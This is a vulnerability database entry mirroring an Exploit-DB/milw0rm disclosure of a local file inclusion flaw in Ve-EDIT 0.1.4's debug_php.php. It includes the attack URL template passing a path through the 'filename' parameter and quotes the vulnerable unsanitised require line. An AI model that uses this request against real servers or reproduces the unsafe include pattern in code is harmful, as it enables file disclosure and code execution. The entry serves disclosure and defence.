Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability

vendor:

Ve-EDIT

by:

CoBRa_21

9,3

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Ve-EDIT

Affected Version From: 0.1.4

Affected Version To: 0.1.4

Patch Exists: Yes

Related CWE: N/A

CPE: a:phpwebeditor:ve-edit:0.1.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability

A vulnerability exists in Ve-EDIT v 0.1.4 (debug_php.php) which allows an attacker to include a local file via the 'filename' parameter in the 'debug_php.php' script. This can be exploited to execute arbitrary PHP code by including files from local resources.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/phpwebeditor/
 
-------------------------------------------------------------------------------------
 
EXPLOÄ°T:
 
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFÄ°]
 
-------------------------------------------------------------------------------------
 
BUG
Line 53:        require("./../".$_GET["filename"]); 
 
-------------------------------------------------------------------------------------

# milw0rm.com [2009-09-01]